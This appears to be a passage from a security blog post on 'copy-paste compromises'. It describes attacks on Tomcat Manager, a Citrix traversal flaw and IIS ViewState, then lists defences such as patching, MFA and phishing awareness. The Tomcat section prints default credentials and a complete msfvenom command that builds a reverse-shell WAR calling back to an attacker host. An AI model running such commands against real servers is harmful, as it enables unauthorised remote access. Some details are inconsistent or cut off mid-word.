Example 1: Exploit Tomcat Manager
In this example, a remote attacker tried to determine whether the target computer was running Apache Tomcat and whether it was configured with a default login. They then tried using different default credentials for access (tomcat: cat, cat: S3cr3t, manager: manager). If the default credentials work well, this can help an attacker gain access to the remote machine’s environment.There are many possible ways to use Tomcat Manager:
- Running verified Tomcat Manager upload code
- Generate the backdoor in .war format
- Tomcat war deployment script
- Generate a JSP web container
Now take one example:
Generate .war format backdoor
The first attacker finds out which target Apache Tomcat is running on, then tries to log in using the default credentials (tomcat: tomcat, tomcat: S3cr3t, manager: manager).The attacker then uses MSFvenom to generate a .war format backdoor for the Java/JSP data part:
- msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.111.128.64 LPORT=1234 -f war > shell.war
After creating a shell.war file, the attacker successfully uploads that file into the Apache Tomcat appl
Once the attacker uploads the file, the attacker will see the /path entry for the malicious file in the application table. To run the .war file, the attacker must click on the path to the /.war file listed in the Applications table. Or they can directly explore http://target_IPort/file_name.
When the attacker executes the file, he obtains a reverse TCP connection via Netcat.
Example 2: Citrix ADC and Citrix Gateway directory traversal vulnerability
Citrix Application Delivery Controller (ADC) and Citrix Gateway allowed an attacker to send directory traversal requests and successfully read sensitive data from system configuration files by bypassing authentication and remotely executing arbitrary code.This vulnerability can be exploited if incorrect pathname handling has been configured. Assume that the system has no data sanitization check and uses the path in incoming requests without any filter. When an unsecured system receives a request, including a path such as /vpn/../vpns/services.html, the server running Citrix converts the path from /vpn/../vpns/ to /VPNs/ . This issue in the server system could allow a remote attacker to abuse directory traversal and gain access to sensitive files without authentication.
Otherwise, it could be even more dangerous. The same issue can be replicated via user input without any validation and/or sanitization. Here, the attacker with the created XML file sends it to the vulnerable server using a POST request. After the attacker makes another HTTP request and visits the rendered file, the malicious content inside the XML file executes and performs the desired task.
Below, a quick POC will show you how directory traversal requests have been successfully handled by insecure systems. Sometimes requests can give you access to sensitive files or even leak sensitive information and in the worst case, remote code execution.
Example 3: Exploitation of ViewState handling in Microsoft IIS servers
Attackers are actively exploiting a deserialization vulnerability that exists in all versions of Microsoft’s Internet Information Services (IIS) that use the .NET Framework (.NET). This vulnerability uses the ViewState parameter of a service to allow remote code execution by unauthorized users.In order to successfully exploit this vulnerability, a malicious user must create a ViewState parameter with malicious content. Currently, the latest installations of .NET on IIS and the parameter are protected by Message Authentication Code (MAC) authentication. In order to exploit this issue, an attacker must obtain the computer key of the IIS server.
How can we reduce risk and improve security against copy-paste compromises?
Multiple controls and best practices certainly reduce the risk against Copy-Paste compromises:Penetration testing
Penetration tests focus on protecting your business from external and internal attackers. Most exploits do not aim to obtain financial details such as credit or debit card numbers. A penetration test can be considered a cyber security exercise to help you improve your processes and reduce the maximum risk from hackers and insiders.
Vulnerability management
Running a vulnerability scan on a schedule helps maintain patches and track new and existing vulnerabilities. You must keep in mind that not all patch management programs are effective and cannot detect any third-party software packages such as Java, PDF readers and thousands of others. Insecure configurations and default credentials make life easy for hackers; it’s an open invitation for them to gain unauthorized access.
Security patches
Multiple issues can be fixed and risk minimized simply by deploying security patches in a timely manner and without granting multiple acceptances of internal risks or exceptional approval due to dependency on a legacy system. Organizations should always calculate the risk of assets before agreeing to an exceptional dependency.
Safety hardening
Our applications and operating systems are often insecure because they use default settings to avoid hiring experts. However, this can sometimes cost the organization. Using hardening best practices can help reduce unnecessary services running as well as reduce the overall attack surface.
Multi-factor authentication
Passwords are traditionally considered the weakest point for abuse. Users/employees are really terrible at setting secure passwords. Many use the same passwords on multiple portals. And keeping passwords written on paper or even in a password journal can be a disaster.
This risk can be reduced by implementing a two-factor authentication process while using RSA hard/soft token, SMS OTP, certificates, biometrics and so on. (Mandatory password management systems that automatically generate complex passwords aren’t a bad idea either!)
Anti-phishing measures
Protecting against phishing attempts is a tricky business these days. An employee may think they are smart enough to understand and differentiate between legitimate and malicious URLs, but that is an inadequate risk mitigation plan. Taking steps such as blocking malicious or unwanted messages by running proxy software, running phishing campaigns, occasional security awareness training, and making sure new employees are aware of these concerns can help reduce risk. For example:
- Don’t click on links or open emails, messages or attachments you didn’t expect or from people or organizations you don’t know
- Be especially careful if the messages seem very attractive or offer you something.
- Before clicking on a link, you should hover over it to see the actual web address you will be redirected to. If you don’t recognize or trust the address at all, or even have any doubts, don’t click on it! It’s always a good idea to search for relevant keywords in search engines to see what comes up.
- If you are not sure about something, it is better to verify its legitimacy with the person, team, friend or family member, not through the message itself, but through independent methods (phone call, speaking in person, etc.)
- To block unwanted advertising messages, always turn on the spam filter
- Keep in mind that your financial institutions, organizations and social media will never ask you for CVV, OTP, passwords or send you a link to enter your personal or financial details, even over HTTPS.
- Always report such email to CA, administrator, HR or any other appropriate department for action
- Instead of copying and pasting links, it’s better to type them into your brows